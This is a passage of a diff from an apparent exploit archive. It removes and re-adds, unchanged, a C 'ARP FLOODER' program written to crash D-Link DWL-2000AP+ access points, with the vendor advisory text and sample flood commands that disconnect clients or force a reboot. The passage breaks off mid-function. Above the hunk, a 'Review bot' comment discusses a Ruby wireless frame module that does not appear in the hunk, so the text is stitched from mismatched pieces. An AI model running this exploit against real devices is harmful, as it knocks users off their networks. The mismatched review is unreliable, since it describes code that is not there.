0x17443c20 0x00008088 0x01bc8000 0x0227581e + +=end + +# milw0rm.com [2006-11-01] diff --git a/platforms/hardware/dos/2915.c b/platforms/hardware/dos/2915.c index 341d1f4f5..5c6dbbb26 100755 --- a/platforms/hardware/dos/2915.c +++ b/platforms/hardware/dos/2915.c 
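Review bot: `ADDR_DST` is fed straight into `eton` in create_frame with no format check, so a value with the wrong number of octets or non-hex characters yields a destination field of the wrong length and silently shifts every later field of the frame; I would validate it up front in run, `raise ArgumentError, "ADDR_DST must be a MAC address" unless datastore['ADDR_DST'] =~ /\A(?:[0-9a-f]{2}:){5}[0-9a-f]{2}\z/i`. The send loop `0.upto(cnt) { |i| wifi.write(frame) }` also transmits cnt+1 frames while the status line reports `#{cnt}`; `1.upto(cnt)` matches the message. `caps` in create_frame is computed and never used — the capabilities field is filled from `Rex::Text.rand_text(2)` — so either drop it or use it in place of that call. The module class and all of its methods start and end inside the hunk.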
@@ -1,748 +1,748 @@
-/*
-
-ARP FLOODER v0.1 - poplix@papuasia.org - 2006-12-04
-designed to crash D-LINK DWL-2000AP+
-
-compile with: gcc arpflood.c -o arpflood
-
-
-*/
-
-
-
-#define _BSD_SOURCE 1
-#define _GNU_SOURCE
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-
-#include
-#include //param.h defines BSD in bsd systems
-#include
-#include
-#include
-
-#include
-#include
-#include
-
-#ifdef BSD
-#include
- #include
-#endif
-
-
-#include
-#include
-#include
-#include
-#include
-
-
-
-#ifdef BSD
-#include
-#include
-#endif
-
-
-#ifdef __linux__
-#include
-#include
-#endif
-
-#ifndef DLT_EN10MB
-#define DLT_EN10MB 1
-#endif
-
-#ifndef DLT_LOOP
-#define DLT_LOOP 10
-#endif
-
-#ifndef DLT_PPP
-#define DLT_PPP 9
-#endif
-
-#define ETHADDR_SIZE 6
-#define ETHHDR_SIZE 14
-#define ETHTYPE_IP 0x0800
-#define ETHERTYPE_ARP 0x0806
-
-
-
-
-
-#define SMALLOC(x,y){x=(y*)malloc(sizeof(y));\
- if( x == NULL){printf("malloc out of memory");\
- exit(9);}\
- }
-
-
-
-#define CALLOC(x,y,z){ x=(y*)calloc(z,sizeof(y));if(x==NULL){\
- printf("calloc out of memory\n");\
- exit(9);}}
-
-#define SSTRNCPY(dst,src,len){strncpy(dst,src,len-1); dst[len-1]=0;}
-#define SSTRNCAT(dst,src,len)strncat(dst,src, len - strlen(dst) - 1);
-
-
-
-
-
-#define ETHARP_PKT_SIZE 42 // eth + arpfixedsize + addresses size
-
-
-#define FTYPE_REQ 1
-#define FTYPE_REPLY 2
-
-
-
-
-struct intf{
- char name[12];
- u_int index;
- int fd;
- u_int mtu;
- u_int type;
-
- u_int32_t ipaddr;
- u_int32_t netmask;
-
- u_char l2addr[6];
- u_int l2addr_size;
- u_int l2hdr_size;
-
-};
-
-
-
-
-struct intf out_intf;
-
-
-
-
-u_int ip_to_int(char *ip, int *err){
- char *inv,*s;
- u_char ret[4];
- int a;
- u_int tmp;
-
- if(ip == NULL || strlen(ip) < 7) return 0;
- s=ip;
- for( a=0; a < 4; a++){
- tmp=strtoul(s,&inv,10);
- if( (*inv != '.' && *inv!=0) || tmp < 0 || tmp > 255 ) {
- if(err != NULL)*err=1;
- return 0;
- }
- ret[a]=tmp;
- s=++inv;
- }
-
- if(err != NULL)*err=0;
- return *((u_int*)ret);
-
-}
-
-
-int str_to_macaddr(char *str, u_char *dst){
- char *inv,*s;
- int a;
- u_int tmp;
-
- if(str == NULL || strlen(str) < 11) return 0;
- s=str;
- for( a=0; a < 6; a++){
- tmp=strtoul(s,&inv,16);
- if( (*inv != ':' && *inv!=0) || tmp < 0x00 || tmp > 0xff )
- return 0;
-
- dst[a]=tmp;
- s=++inv;
- }
-
-
- return 1;
-
-}
-
-
-
-char *int_to_ip(u_int32_t ip){
- u_char *tmp=(u_char *)&ip;
- static char ret[16];
- memset(ret,0,sizeof(ret));
- sprintf(ret,"%u.%u.%u.%u",tmp[0] & 0xff,tmp[1] & 0xff,tmp[2] & 0xff,tmp[3] & 0xff);
- return ret;
-
-}
-
-
-char *macaddr_to_str(u_char *mac){
- static char ret[18];
- memset(ret,0,sizeof(ret));
- sprintf(ret,"%02x:%02x:%02x:%02x:%02x:%02x",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);
- return ret;
-
-}
-
-
-
-
-
-
-
-
-int build_ether_hdr(u_char *dst, u_char* src,u_short type,u_char* dstbuff){
- memcpy(dstbuff,dst,ETHADDR_SIZE);
- memcpy(dstbuff+6,src,ETHADDR_SIZE);
-
- *( (u_short*)(dstbuff+12) ) = htons(type);
-
- return 1;
-
-}
-
-
-
-
-int build_arp_hdr(u_char *hdst,u_int32_t pdst,u_char* hsrc,u_int32_t psrc,u_short arpop,u_char* dstbuff){
- struct arphdr* hdr= (struct arphdr*)dstbuff;
- u_int off;
-
- hdr->ar_hrd=htons(ARPHRD_ETHER);
- hdr->ar_pro=htons(ETHTYPE_IP);
- hdr->ar_hln=ETHADDR_SIZE;
- hdr->ar_pln=4;
- hdr->ar_op=htons(arpop);
-
- off=8;
-
- memcpy(dstbuff + off,hsrc,ETHADDR_SIZE);
- off+=ETHADDR_SIZE;
-
- memcpy(dstbuff + off,(u_char*)&psrc,4);
- off+=4,
-
- memcpy(dstbuff + off,hdst,ETHADDR_SIZE);
- off+=ETHADDR_SIZE;
-
- memcpy(dstbuff + off,(u_char*)&pdst,4);
-
- return 1;
-}
-
-
-
-int arp_request(u_int32_t ripaddr,u_int32_t ipsrc,u_char *macsrc){
- u_char arpbuff[ETHARP_PKT_SIZE];
-
- if(macsrc==NULL)macsrc=out_intf.l2addr;
- if(ipsrc==0)ipsrc=out_intf.ipaddr;
- build_ether_hdr((u_char*)"\xff\xff\xff\xff\xff\xff",macsrc,ETHERTYPE_ARP,arpbuff);
-
- build_arp_hdr((u_char*)"\x0\x0\x0\x0\x0\x0",
- ripaddr,
- macsrc,
- ipsrc,
- ARPOP_REQUEST,
- arpbuff + ETHHDR_SIZE
- );
-
- write_link(&out_intf,arpbuff,sizeof(arpbuff));
-
- return 1;
-}
-
-
-
-
-int arp_reply(u_int32_t ipdst,u_char *dstmac,u_int32_t ipsrc,u_char *srcmac){
- u_char arpbuff[ETHHDR_SIZE + ETHARP_PKT_SIZE];
-
- if(srcmac==NULL)srcmac=out_intf.l2addr;
-
- build_ether_hdr(dstmac, srcmac, ETHERTYPE_ARP, arpbuff);
- build_arp_hdr(dstmac, ipdst, srcmac, ipsrc, ARPOP_REPLY, arpbuff+ETHHDR_SIZE);
- write_link(&out_intf,arpbuff,sizeof(arpbuff));
-
- return 1;
-}
-
-
-
-
-#ifdef BSD
-
-int getifinfo(char *name,struct intf *iface){
- struct ifaddrs *ifap, *ifa;
- int find=0;
-
- int mib[]={CTL_NET,AF_ROUTE,0,AF_LINK,NET_RT_IFLIST,0};
- size_t len;
- u_char *buff, *next, *end;
- struct if_msghdr *ifm;
- struct sockaddr_dl *sdl;
-
-
- // get the list
- if(getifaddrs(&ifap) < 0) return 0;
-
- if(!ifap) return 0;
- //nota che ogni inf compare due volte in lista, una volta come AF_LINK e una AF_INET
- for(ifa = ifap; ifa; ifa = ifa->ifa_next)
- if(!strcmp(name,ifa->ifa_name)){
- //copy only the first time
- if(find==0){
- memset(iface->name,0,sizeof(iface->name));
- SSTRNCPY(iface->name,name,sizeof(iface->name));
- }
- find=1;
- if(ifa->ifa_addr->sa_family == AF_LINK){
- iface->mtu=((struct if_data*)ifa->ifa_data)->ifi_mtu;
-
- switch(((struct if_data*)ifa->ifa_data)->ifi_type){
- case IFT_ETHER:
- iface->type=DLT_EN10MB;
- iface->l2hdr_size=ETHHDR_SIZE;
- break;
- case IFT_GIF:
- case IFT_LOOP:
- iface->type=DLT_LOOP;
- iface->l2hdr_size=0;
- break;
- case IFT_PPP:
- iface->type = DLT_PPP;
- default:
- freeifaddrs(ifap);
- return 0;
- }
-
- }
- if(ifa->ifa_addr->sa_family == AF_INET){
- iface->ipaddr = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_addr)->sin_addr.s_addr;
- iface->netmask = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_netmask)->sin_addr.s_addr;
- }
- }
-
- freeifaddrs(ifap);
-
- //get hardware address
- if (sysctl(mib, ETHADDR_SIZE, NULL, &len, NULL, 0) == -1){
- printf("getting hardware address\n");
- exit(1);
- }
-
- CALLOC(buff,u_char,len);
- if (sysctl(mib, ETHADDR_SIZE, buff, &len, NULL, 0) < 0){
- free(buff);
- printf("getting hardware address\n");
- exit(1);
- }
- end = buff + len;
-
- for (next = buff ; next < end ; next += ifm->ifm_msglen){
- ifm = (struct if_msghdr *)next;
- if (ifm->ifm_type == RTM_IFINFO){
- sdl = (struct sockaddr_dl *)(ifm + 1);
- if (strncmp(&sdl->sdl_data[0], iface->name, sdl->sdl_nlen) == 0){
- memcpy(iface->l2addr,LLADDR(sdl),ETHADDR_SIZE);
- break;
- }
- }
- }
- free(buff);
-
- iface->index=0; // dont care
-
- return find;
-
-
- }
-
-
-//int wrink(u_int fd,u_char *frame, u_int size){
-int write_link(struct intf *iface,u_char *frame, u_int size){
- int c;
-
- if (iface->fd < 0){
- printf("%s\n","bpf error");
- exit(2);
- }
- c = write(iface->fd, frame, size);
-
- if (c != size){
- printf("error writing to bpf,, written:%d bytes\n",c);
- exit(3);
- }
-
- return (c);
-}
-
-
-int open_link(char* ifname){
- int i, fd;
- char devname[12];
- struct ifreq ifr;
-
- for (i=0; i<100; i++){
- sprintf(devname, "/dev/bpf%u", i);
- fd = open(devname, O_RDWR);
- if (fd == -1 && errno == EBUSY)
- continue;
- else
- break;
- }
-
- if (fd == -1){
- printf("unable to open bpf\n");
- exit(4);
- }
-
-
- SSTRNCPY(ifr.ifr_name, ifname, sizeof(ifr.ifr_name));
-
- if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) == -1){
- printf("attaching interface to bpf\n");
- exit(4);
- }
-
-
- return (fd);
-}
-
-
-#endif
-//end of BSD code
-
-
-
-#ifdef __linux__
- //fetifinfo sets:ifname, mtu, link-type,layer4 address,layer4 netmask,
-
-int getifinfo(char *name,struct intf *iface){
- int fd,find=0;
- struct ifconf ifc;
- struct ifreq ibuf[16], ifr, *ifrp, *ifend;
- struct sockaddr_in sa;
-
-
-
-
- if ( (fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) return 0;
-
- memset(ibuf, 0, sizeof(struct ifreq)*16);
- ifc.ifc_len = sizeof(ibuf);
- ifc.ifc_buf = (caddr_t) ibuf;
-
- /* gets interfaces list */
- if ( ioctl(fd, SIOCGIFCONF, (char*)&ifc) == -1 ||
- ifc.ifc_len < sizeof(struct ifreq) )
- goto bad;
-
- /* ifrp points to buffer and ifend points to buffer's end */
- ifrp = ibuf;
- ifend = (struct ifreq*) ((char*)ibuf + ifc.ifc_len);
-
- for (; ifrp < ifend; ifrp++) {
- if(strcmp(ifrp->ifr_name,name))continue;
- find=1;
- SSTRNCPY(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name));
-
- //get if flags
- if(ioctl(fd, SIOCGIFFLAGS, (char*)&ifr) == -1)
- goto bad;
-
- //if is down
- if ( !(ifr.ifr_flags & IFF_UP) )goto bad;
-
- SSTRNCPY(iface->name, ifr.ifr_name, sizeof(iface->name));
-
- //get l3 addr
- if (ioctl(fd, SIOCGIFADDR, (char*)&ifr) == -1)goto bad;
-
- if (ifr.ifr_ifru.ifru_addr.sa_family == AF_INET) {
- //save addr
- iface->ipaddr=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_addr)->sin_addr.s_addr;
-
- //get netmask
- if(ioctl(fd, SIOCGIFNETMASK, (char*)&ifr) == -1)goto bad;
- iface->netmask=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_netmask)->sin_addr.s_addr;
-
- //get index
- if (ioctl(fd, SIOCGIFINDEX, (char*)&ifr) == -1)goto bad;
- iface->index=ifr.ifr_ifindex;
-
- //get link-type
- if(ioctl(fd, SIOCGIFHWADDR, (char*)&ifr) == -1)goto bad;
- switch (ifr.ifr_hwaddr.sa_family) {
- //__linux__ encaps loop in eth frames
- case ARPHRD_LOOPBACK:
- case ARPHRD_ETHER:
- case ARPHRD_METRICOM:
- iface->type = DLT_EN10MB;
- iface->l2hdr_size=ETHHDR_SIZE;
- break;
- case ARPHRD_PPP:
- default:
- goto bad;
- }
- }else goto bad;
- //get MTU
- if(ioctl(fd, SIOCGIFMTU, &ifr) == -1)goto bad;
- iface->mtu=ifr.ifr_mtu;
- }
-
- close(fd);
- return 1;
-
- bad:
- close(fd);
- printf("%s\n","getting interface infos");
- exit(5);
- }
-
-
-int write_link(struct intf *iface,u_char *frame, u_int size){
- int c;
- struct sockaddr_ll sa;
-
- memset(&sa, 0, sizeof (sa));
-
- sa.sll_family = AF_PACKET;
- sa.sll_ifindex = iface->index;
- sa.sll_protocol = htons(ETH_P_ALL);
-
- c = sendto(iface->fd, frame, size, 0, (struct sockaddr *)&sa, sizeof (sa));
-
- if (c != size){
- printf("error writing to bpf,, written:%d bytes\n",c);
- exit(6);
- }
- return (c);
-}
-
-
-
-int open_link(char *ifname){
- struct ifreq ifr;
- int n = 1,fd;
-
-
- fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
-
- if (fd == -1){
- printf("opening link %s",ifname);
- exit(7);
- }
-
- memset(&ifr, 0, sizeof (ifr));
-
- SSTRNCPY(ifr.ifr_name,ifname,sizeof (ifr.ifr_name));
-
- if (ioctl(fd, SIOCGIFHWADDR, &ifr) < 0 ){
- printf("%s\n","SIOCGIFHWADDR");
- exit(7);
- }
-
-
-#ifdef SO_BROADCAST
-/*
- * man 7 socket
- *
- * Set or get the broadcast flag. When enabled, datagram sockets
- * receive packets sent to a broadcast address and they are allowed
- * to send packets to a broadcast address. This option has no
- * effect on stream-oriented sockets.
- */
- if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST, &n, sizeof(n)) == -1){
- printf("set sock opt: SO_BROADCAST");
- exit(7);
- }
-
-#endif /* SO_BROADCAST */
-
- return fd;
-
-
-}
-
-
-
- #endif //linux
-
-
-void adv(){
-
- printf( "D-LINK DWL-2000AP+ with firmware version 2.11 is prone to two remote denial\n\
-of service vulnerability because it fails to handle arp flooding. \n\
-The first vuln causes the wireless link (802.11) to be resetted and the arp \n\
-table to be rebuilded. All clients connected to the AP are disconnected.\n\
-This bug can be triggered by sending lots of arp replies through the wired link\n\
-or the radio one at a very high speed.\n\
-The second vulnerability affects the wireless link only and are quite harder\n\
-to trigger but causes the AP firmware to crash making a manual reboot mandatory.\n\
-This bug can be triggered only if no other D-LINK ethernet products are visible \n\
-to AP, if wep encryption is enabled and it needs a very large amount of\n\
-arp-requests to be broadcasted through its wireless link at a very high speed. \n\
-This exploit works in the 90%% of cases because sometimes the AP is able to ban\n\
-the flooding client before the exploiting process is complete.\n\
-D-LINK doesn't support this product anymore so no solution is available.\n\
-Other products can be vulnerable.\n\
-\n\
-Not vulnerable: DWL-700AP\n\n");
-
-
- exit(0);
-}
-
-void info(char *pname){
- printf( "\nThis program has been written to audit some D-LINK ethernet products\n"
- "cuz it seems that some D-LINK AP will freeze if arp flooded\n\n"
- "At the this time only D-LINK DWL-2000AP+ is reported to be vulnerable so\n"
- "a good idea is to test other products...\n\n"
- "Test 1: it makes the AP to disconnect all connected clients\n"
- " a quik flood with arp-replies is sufficent to trigger this vuln\n"
- " %s REPLY en1 @ @ 10.0.0.140 900000 0 00:de:09:a1:bb:c7\n\n"
- "Test 2: it makes the AP firmware to crash making a manual reboot mandatory\n"
- " a flood with a large amount of arp-requests\n"
- " %s REQ en1 @ @ 10.0.0.140 9000000 0\n"
- ,pname,pname);
-
- exit(0);
-}
-
-
-void usage(char *pname){
- printf( "usage:\n %s info or advisory \nor\n %s []\n"
- "if srcMAC or srcIP is equal to '@' your own MAC/IP address will be used\n"
- ,pname,pname);
- exit(0);
-
-}
-
-
-
-main(int argc, char **argv){
-
- int pktnr,a,c,ftype,err,delay;
- u_char *srcmac,dstmac[6];
- u_int32_t srcip,dstip;
- char *inv;
-
- if( argc < 2 )usage(argv[0]);
- if(*argv[1]=='i')info(argv[0]);
- if(*argv[1]=='a')adv();
- if(argc < ( (!strcmp(argv[1],"REQ")) ? 8 : 9 ) ) usage(argv[0]);
-
- if(!getifinfo(argv[2],&out_intf)){
- printf("error opening interface %s\n",argv[2]);
- exit(2);
- }
-
-
-
-
- out_intf.fd=open_link(out_intf.name);
-
-
-
- printf("ARP FLOODER v0.1 by poplix - poplix@papuasia.org - 2006-12-09\n"
- "written in a very few hours by taking pieces of code from some of mine ancient projects\n\n"
- "\nflooding on %s, ",argv[2]);
-
-
- if(!strcmp(argv[1],"REQ")){
- printf("flood type: REQ, ");
- ftype=FTYPE_REQ;
- } else {
- printf("flood type: REPLY, ");
- ftype=FTYPE_REPLY;
- }
-
- if(*argv[3] != '@'){
- SMALLOC(srcmac,u_char);
- if(!str_to_macaddr(argv[3],srcmac)){
- printf("\nerror while parsing srcmac: %s\n",argv[3]);
- exit(2);
- }
- } else
- srcmac=out_intf.l2addr;
-
- printf(" srcMAC: %s, ",macaddr_to_str(srcmac));
-
-
- if(ftype== FTYPE_REPLY && !str_to_macaddr(argv[8],dstmac)){
- printf("\nerror while parsing dstmac: %s\n",argv[8]);
- exit(2);
- }
- if(ftype==FTYPE_REPLY)
- printf("dstMAC: %s, ",argv[8]);
-
-
- if(*argv[4] != '@'){
- ip_to_int(argv[4],&err);
- if(err){
- printf("\nerror while parsing srcip: %s\n",argv[4]);
- exit(2);
- }
- } else
- srcip=out_intf.ipaddr;
- printf("srcIP: %s, ",int_to_ip(srcip));
-
-
- dstip=ip_to_int(argv[5],&err);
- if(err){
- printf("\nerror while parsing dstip: %s\n",argv[5]);
- exit(2);
- }
- printf("dstIP: %s, ",argv[5]);
-
-
-
- pktnr=strtoul(argv[6],&inv,10);
- if(*inv != 0){
- printf("\nerror while parsing pkts number: %s\n",argv[6]);
- exit(1);
- }
- printf("pkts: %u, ",pktnr);
-
-
- delay=(strtoul(argv[7],&inv,10) * 1000);
- if(*inv != 0){
- printf("\nerror while parsing delay: %s\n",argv[6]);
- exit(1);
- }
- printf("delay: %u ms\n",delay/1000);
- printf("\nflooding...\n> 0");
- fflush(stdout);
-
-
- for(a=0;a0 && (a%128) == 0) ){
- printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",a);
- fflush(stdout);
- }
- if(ftype==FTYPE_REQ)
- arp_request(dstip,srcip,srcmac);
- else
- arp_reply(dstip,dstmac,srcip,srcmac);
-
- if(delay>0)usleep(delay);
- }
-
- printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",pktnr);
- printf("\ndone\n");
- close(out_intf.fd);
- exit(0);
-}
-
-// milw0rm.com [2006-12-11]
+/*
+
+ARP FLOODER v0.1 - poplix@papuasia.org - 2006-12-04
+designed to crash D-LINK DWL-2000AP+
+
+compile with: gcc arpflood.c -o arpflood
+
+
+*/
+
+
+
+#define _BSD_SOURCE 1
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+#include
+#include //param.h defines BSD in bsd systems
+#include
+#include
+#include
+
+#include
+#include
+#include
+
+#ifdef BSD
+#include
+ #include
+#endif
+
+
+#include
+#include
+#include
+#include
+#include
+
+
+
+#ifdef BSD
+#include
+#include
+#endif
+
+
+#ifdef __linux__
+#include
+#include
+#endif
+
+#ifndef DLT_EN10MB
+#define DLT_EN10MB 1
+#endif
+
+#ifndef DLT_LOOP
+#define DLT_LOOP 10
+#endif
+
+#ifndef DLT_PPP
+#define DLT_PPP 9
+#endif
+
+#define ETHADDR_SIZE 6
+#define ETHHDR_SIZE 14
+#define ETHTYPE_IP 0x0800
+#define ETHERTYPE_ARP 0x0806
+
+
+
+
+
+#define SMALLOC(x,y){x=(y*)malloc(sizeof(y));\
+ if( x == NULL){printf("malloc out of memory");\
+ exit(9);}\
+ }
+
+
+
+#define CALLOC(x,y,z){ x=(y*)calloc(z,sizeof(y));if(x==NULL){\
+ printf("calloc out of memory\n");\
+ exit(9);}}
+
+#define SSTRNCPY(dst,src,len){strncpy(dst,src,len-1); dst[len-1]=0;}
+#define SSTRNCAT(dst,src,len)strncat(dst,src, len - strlen(dst) - 1);
+
+
+
+
+
+#define ETHARP_PKT_SIZE 42 // eth + arpfixedsize + addresses size
+
+
+#define FTYPE_REQ 1
+#define FTYPE_REPLY 2
+
+
+
+
+struct intf{
+ char name[12];
+ u_int index;
+ int fd;
+ u_int mtu;
+ u_int type;
+
+ u_int32_t ipaddr;
+ u_int32_t netmask;
+
+ u_char l2addr[6];
+ u_int l2addr_size;
+ u_int l2hdr_size;
+
+};
+
+
+
+
+struct intf out_intf;
+
+
+
+
+u_int ip_to_int(char *ip, int *err){
+ char *inv,*s;
+ u_char ret[4];
+ int a;
+ u_int tmp;
+
+ if(ip == NULL || strlen(ip) < 7) return 0;
+ s=ip;
+ for( a=0; a < 4; a++){
+ tmp=strtoul(s,&inv,10);
+ if( (*inv != '.' && *inv!=0) || tmp < 0 || tmp > 255 ) {
+ if(err != NULL)*err=1;
+ return 0;
+ }
+ ret[a]=tmp;
+ s=++inv;
+ }
+
+ if(err != NULL)*err=0;
+ return *((u_int*)ret);
+
+}
+
+
+int str_to_macaddr(char *str, u_char *dst){
+ char *inv,*s;
+ int a;
+ u_int tmp;
+
+ if(str == NULL || strlen(str) < 11) return 0;
+ s=str;
+ for( a=0; a < 6; a++){
+ tmp=strtoul(s,&inv,16);
+ if( (*inv != ':' && *inv!=0) || tmp < 0x00 || tmp > 0xff )
+ return 0;
+
+ dst[a]=tmp;
+ s=++inv;
+ }
+
+
+ return 1;
+
+}
+
+
+
+char *int_to_ip(u_int32_t ip){
+ u_char *tmp=(u_char *)&ip;
+ static char ret[16];
+ memset(ret,0,sizeof(ret));
+ sprintf(ret,"%u.%u.%u.%u",tmp[0] & 0xff,tmp[1] & 0xff,tmp[2] & 0xff,tmp[3] & 0xff);
+ return ret;
+
+}
+
+
+char *macaddr_to_str(u_char *mac){
+ static char ret[18];
+ memset(ret,0,sizeof(ret));
+ sprintf(ret,"%02x:%02x:%02x:%02x:%02x:%02x",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);
+ return ret;
+
+}
+
+
+
+
+
+
+
+
+int build_ether_hdr(u_char *dst, u_char* src,u_short type,u_char* dstbuff){
+ memcpy(dstbuff,dst,ETHADDR_SIZE);
+ memcpy(dstbuff+6,src,ETHADDR_SIZE);
+
+ *( (u_short*)(dstbuff+12) ) = htons(type);
+
+ return 1;
+
+}
+
+
+
+
+int build_arp_hdr(u_char *hdst,u_int32_t pdst,u_char* hsrc,u_int32_t psrc,u_short arpop,u_char* dstbuff){
+ struct arphdr* hdr= (struct arphdr*)dstbuff;
+ u_int off;
+
+ hdr->ar_hrd=htons(ARPHRD_ETHER);
+ hdr->ar_pro=htons(ETHTYPE_IP);
+ hdr->ar_hln=ETHADDR_SIZE;
+ hdr->ar_pln=4;
+ hdr->ar_op=htons(arpop);
+
+ off=8;
+
+ memcpy(dstbuff + off,hsrc,ETHADDR_SIZE);
+ off+=ETHADDR_SIZE;
+
+ memcpy(dstbuff + off,(u_char*)&psrc,4);
+ off+=4,
+
+ memcpy(dstbuff + off,hdst,ETHADDR_SIZE);
+ off+=ETHADDR_SIZE;
+
+ memcpy(dstbuff + off,(u_char*)&pdst,4);
+
+ return 1;
+}
+
+
+
+int arp_request(u_int32_t ripaddr,u_int32_t ipsrc,u_char *macsrc){
+ u_char arpbuff[ETHARP_PKT_SIZE];
+
+ if(macsrc==NULL)macsrc=out_intf.l2addr;
+ if(ipsrc==0)ipsrc=out_intf.ipaddr;
+ build_ether_hdr((u_char*)"\xff\xff\xff\xff\xff\xff",macsrc,ETHERTYPE_ARP,arpbuff);
+
+ build_arp_hdr((u_char*)"\x0\x0\x0\x0\x0\x0",
+ ripaddr,
+ macsrc,
+ ipsrc,
+ ARPOP_REQUEST,
+ arpbuff + ETHHDR_SIZE
+ );
+
+ write_link(&out_intf,arpbuff,sizeof(arpbuff));
+
+ return 1;
+}
+
+
+
+
+int arp_reply(u_int32_t ipdst,u_char *dstmac,u_int32_t ipsrc,u_char *srcmac){
+ u_char arpbuff[ETHHDR_SIZE + ETHARP_PKT_SIZE];
+
+ if(srcmac==NULL)srcmac=out_intf.l2addr;
+
+ build_ether_hdr(dstmac, srcmac, ETHERTYPE_ARP, arpbuff);
+ build_arp_hdr(dstmac, ipdst, srcmac, ipsrc, ARPOP_REPLY, arpbuff+ETHHDR_SIZE);
+ write_link(&out_intf,arpbuff,sizeof(arpbuff));
+
+ return 1;
+}
+
+
+
+
+#ifdef BSD
+
+int getifinfo(char *name,struct intf *iface){
+ struct ifaddrs *ifap, *ifa;
+ int find=0;
+
+ int mib[]={CTL_NET,AF_ROUTE,0,AF_LINK,NET_RT_IFLIST,0};
+ size_t len;
+ u_char *buff, *next, *end;
+ struct if_msghdr *ifm;
+ struct sockaddr_dl *sdl;
+
+
+ // get the list
+ if(getifaddrs(&ifap) < 0) return 0;
+
+ if(!ifap) return 0;
+ //nota che ogni inf compare due volte in lista, una volta come AF_LINK e una AF_INET
+ for(ifa = ifap; ifa; ifa = ifa->ifa_next)
+ if(!strcmp(name,ifa->ifa_name)){
+ //copy only the first time
+ if(find==0){
+ memset(iface->name,0,sizeof(iface->name));
+ SSTRNCPY(iface->name,name,sizeof(iface->name));
+ }
+ find=1;
+ if(ifa->ifa_addr->sa_family == AF_LINK){
+ iface->mtu=((struct if_data*)ifa->ifa_data)->ifi_mtu;
+
+ switch(((struct if_data*)ifa->ifa_data)->ifi_type){
+ case IFT_ETHER:
+ iface->type=DLT_EN10MB;
+ iface->l2hdr_size=ETHHDR_SIZE;
+ break;
+ case IFT_GIF:
+ case IFT_LOOP:
+ iface->type=DLT_LOOP;
+ iface->l2hdr_size=0;
+ break;
+ case IFT_PPP:
+ iface->type = DLT_PPP;
+ default:
+ freeifaddrs(ifap);
+ return 0;
+ }
+
+ }
+ if(ifa->ifa_addr->sa_family == AF_INET){
+ iface->ipaddr = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_addr)->sin_addr.s_addr;
+ iface->netmask = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_netmask)->sin_addr.s_addr;
+ }
+ }
+
+ freeifaddrs(ifap);
+
+ //get hardware address
+ if (sysctl(mib, ETHADDR_SIZE, NULL, &len, NULL, 0) == -1){
+ printf("getting hardware address\n");
+ exit(1);
+ }
+
+ CALLOC(buff,u_char,len);
+ if (sysctl(mib, ETHADDR_SIZE, buff, &len, NULL, 0) < 0){
+ free(buff);
+ printf("getting hardware address\n");
+ exit(1);
+ }
+ end = buff + len;
+
+ for (next = buff ; next < end ; next += ifm->ifm_msglen){
+ ifm = (struct if_msghdr *)next;
+ if (ifm->ifm_type == RTM_IFINFO){
+ sdl = (struct sockaddr_dl *)(ifm + 1);
+ if (strncmp(&sdl->sdl_data[0], iface->name, sdl->sdl_nlen) == 0){
+ memcpy(iface->l2addr,LLADDR(sdl),ETHADDR_SIZE);
+ break;
+ }
+ }
+ }
+ free(buff);
+
+ iface->index=0; // dont care
+
+ return find;
+
+
+ }
+
+
+//int wrink(u_int fd,u_char *frame, u_int size){
+int write_link(struct intf *iface,u_char *frame, u_int size){
+ int c;
+
+ if (iface->fd < 0){
+ printf("%s\n","bpf error");
+ exit(2);
+ }
+ c = write(iface->fd, frame, size);
+
+ if (c != size){
+ printf("error writing to bpf,, written:%d bytes\n",c);
+ exit(3);
+ }
+
+ return (c);
+}
+
+
+int open_link(char* ifname){
+ int i, fd;
+ char devname[12];
+ struct ifreq ifr;
+
+ for (i=0; i<100; i++){
+ sprintf(devname, "/dev/bpf%u", i);
+ fd = open(devname, O_RDWR);
+ if (fd == -1 && errno == EBUSY)
+ continue;
+ else
+ break;
+ }
+
+ if (fd == -1){
+ printf("unable to open bpf\n");
+ exit(4);
+ }
+
+
+ SSTRNCPY(ifr.ifr_name, ifname, sizeof(ifr.ifr_name));
+
+ if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) == -1){
+ printf("attaching interface to bpf\n");
+ exit(4);
+ }
+
+
+ return (fd);
+}
+
+
+#endif
+//end of BSD code
+
+
+
+#ifdef __linux__
+ //fetifinfo sets:ifname, mtu, link-type,layer4 address,layer4 netmask,
+
+int getifinfo(char *name,struct intf *iface){
+ int fd,find=0;
+ struct ifconf ifc;
+ struct ifreq ibuf[16], ifr, *ifrp, *ifend;
+ struct sockaddr_in sa;
+
+
+
+
+ if ( (fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) return 0;
+
+ memset(ibuf, 0, sizeof(struct ifreq)*16);
+ ifc.ifc_len = sizeof(ibuf);
+ ifc.ifc_buf = (caddr_t) ibuf;
+
+ /* gets interfaces list */
+ if ( ioctl(fd, SIOCGIFCONF, (char*)&ifc) == -1 ||
+ ifc.ifc_len < sizeof(struct ifreq) )
+ goto bad;
+
+ /* ifrp points to buffer and ifend points to buffer's end */
+ ifrp = ibuf;
+ ifend = (struct ifreq*) ((char*)ibuf + ifc.ifc_len);
+
+ for (; ifrp < ifend; ifrp++) {
+ if(strcmp(ifrp->ifr_name,name))continue;
+ find=1;
+ SSTRNCPY(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name));
+
+ //get if flags
+ if(ioctl(fd, SIOCGIFFLAGS, (char*)&ifr) == -1)
+ goto bad;
+
+ //if is down
+ if ( !(ifr.ifr_flags & IFF_UP) )goto bad;
+
+ SSTRNCPY(iface->name, ifr.ifr_name, sizeof(iface->name));
+
+ //get l3 addr
